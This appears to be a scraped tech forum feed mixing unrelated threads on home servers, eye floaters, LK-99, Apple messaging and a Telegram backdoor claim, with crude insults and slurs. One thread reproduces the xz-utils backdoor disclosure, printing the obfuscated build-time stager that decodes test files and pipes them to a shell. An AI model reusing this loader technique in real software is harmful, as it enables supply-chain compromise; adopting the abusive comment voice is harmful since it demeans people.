- 16
- 53
You gotta understand though, they've only got 160 million per year to spend, you have to prioritize.
- 7
- 35
My janny lawyer has instructed me to not voice what needs to be done to OP.
Why not just use SSH password-less and use terminal. Efficient, lightweight, and you can do anything with that.
extra feature my friends can easily turn on my minecraft server if they wanna play without any command line magic
: I actually made this lol https://github.com/SevenNotFound/DSH
Any suggestions where I can improve it? Also, can I see your code?
edit: i cant really give advice since my code is also trash
: darn I actually just used ChatGPT for most of the code lmao
- 4
- 14
Orange Site:
- 21
- 16
I know this isn't specifically tech related but this is a common issue for people who are shortsighted which includes a lot of overly-tech-obsessed people. Anyone have issues with this? Since about 5 years ago my left eye is so full of shit it's like looking through a constantly drifting cloud of spiderwebs. It's really a nuisance and a heck of a distraction when working on a bright screen, I end up 'chasing' the floaters around instead of being able to focus on the text or whatever I'm meant to be doing.
I'm thinking of having them cleaned out (youtube video related) but the surgery is a bit scary, it involves literally plumbing your eyeball in and then replacing the polluted gel inside of it with a clear fluid. (Yeahhhh.)
Just wondering if anyone else is affected by this and if they've done anything about it? I don't think there are any solutions other than the surgery or just tolerating it.
It's VERY ANNOYING.
- Bepis : ip grabber
- 33
- 62
This is your daily LK-99 update. Basically this letter is making fun of AI regulators etcetc
Also there have been some more developments in LK-99. Basically more and more people are replicating it The existence of overbros confuses me at this point, like take the L lol
https://www.tomshardware.com/news/superconductor-levitates-at-room-temperature-but-questions-remain
https://www.tomshardware.com/news/engineer-details-messy-lk-99-superconductor-fabrication-process
- 8
- 9
- 33
- 29
- 7
- 14
- 21
- 37
- CREAMY_DOG_ORGASM : Idk but can you buy me an unban award please
- 33
- 19
I'm not spending nearly $500 after taxes for a midrange years old card, I'm just not going to do it.
- 23
- 52
"I don't hear our users asking that we put a lot of energy" into RCS, says Tim Cook in response to a question at Code. "I would love to convert you to an iPhone."
— nilay patel (@reckless) September 8, 2022
"I can't send my mom certain videos," says the questioner.
"Buy your mom an iPhone," says Tim.
I will never understand redditors jerking themselves into a frothing mixture of c*m and shit over RCS
I know the EU is working on legislation that touches on cross platform messaging, I hope it comes to fruition.
US redditard hoping the EU will fix a problem that, at this point, only exists in the US
Buy your mom an iPhone - Tim Cook
I love Apple but I really hope this bites him back. Gosh this is most anti trust thing I have read in a while.
Android user claiming to love Apple. Very believable. Also hopes they get reamed for anti-trust for telling people to buy their product. The smartest redditor.
Tim is well aware that offering iMessage on Android or adopting RCS would cause a significant portion of their customer base to consider Android, and would do nothing to attract users to iOS. It would be like Microsoft suddenly offering DirectX or ActiveX plugins on macOS in the mid-2000s.
This dude believes that 25%+ iPhone users will switch to Android because of this feature that no normie has ever heard of
Buy your mom an iPhone
Capitalism at work, folks!
He’s being a bit classist there.
- 14
- 10
I've been reading some Effective Altruist writings and learned that even if AI had moral goals it could be very dangerous .
Like imagine an AI whos goal was to maximize the number of mosquito nets given to Africa, sounds great right?
NO! Because the AI would be willing to do anything in order to achieve it's goals it might do something like commit one of the largest acts of fraud in history to get the money for more mosquito nets!
Hmm... what does this remind me of?
- 9
- 20
I was bitching about the planned closure a bunch on Wednesday night, turns out they voted to keep it open until 2030 the next morning
- 31
- 63
https://github.com/AUTOMATIC1111/stable-diffusion-webui
UPDATE 2: This was the reason given by GitHub: https://archived.moe/g/thread/90718880#p90719629
- 41
- 68
== Compromised Release Tarball ==
One portion of the backdoor is solely in the distributed tarballs. For
easier reference, here's a link to debian's import of the tarball, but it is
also present in the tarballs for 5.6.0 and 5.6.1:
That line is not in the upstream source of build-to-host, nor is
build-to-host used by xz in git. However, it is present in the tarballs
released upstream, except for the "source code" links, which I think github
generates directly from the repository contents:
https://github.com/tukaani-project/xz/releases/tag/v5.6.0
https://github.com/tukaani-project/xz/releases/tag/v5.6.1
This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.
This script is executed and, if some preconditions match, modifies
$builddir/src/liblzma/Makefile to contain
am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1
which ends up as
...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " -_" " _-" | xz -d | /bin/bash >/dev/null 2>&1; ...
Leaving out the "| bash" that produces
####Hello####
#��Z�.hj�
eval grep ^srcdir= config.status
if test -f ../../config.status;then
eval grep ^srcdir= ../../config.status
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
After de-obfuscation this leads to the attached injected.txt.
== Compromised Repository ==
The files containing the bulk of the exploit are in an obfuscated form in
tests/files/bad-3-corrupt_lzma2.xz
tests/files/good-large_compressed.lzma
committed upstream. They were initially added in
https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0
Note that the files were not even used for any "tests" in 5.6.0.
Subsequently the injected code (more about that below) caused valgrind errors
and crashes in some configurations, due the stack layout differing from what
the backdoor was expecting. These issues were attempted to be worked around
in 5.6.1:
https://github.com/tukaani-project/xz/commit/e5faaebbcf02ea880cfc56edc702d4f7298788ad
https://github.com/tukaani-project/xz/commit/72d2933bfae514e0dbb123488e9f1eb7cf64175f
https://github.com/tukaani-project/xz/commit/82ecc538193b380a21622aea02b0ba078e7ade92
For which the exploit code was then adjusted:
https://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89
Given the activity over several weeks, the committer is either directly
involved or there was some quite severe compromise of their
system. Unfortunately the latter looks like the less likely explanation, given
they communicated on various lists about the "fixes" mentioned above.
!chuds !nonchuds CHECK YO SELF. YEAR OF THE LINUX DESKTOP 2024
- 11
- 30
TELEGRAM FOUNDER: THE U.S. TRIED TO HIRE MY EMPLOYEE TO HELP THEM SPY ON USERS
— Mario Nawfal (@MarioNawfal) April 17, 2024
Tucker:
"The US government tried to secretly hire your engineer?"
Doruv:
"That's what he told me. They wanted him to code open-source tools into the app that would serve as backdoors."
Tucker:… https://t.co/ClERJeTG7R pic.twitter.com/6WWCcmZsd3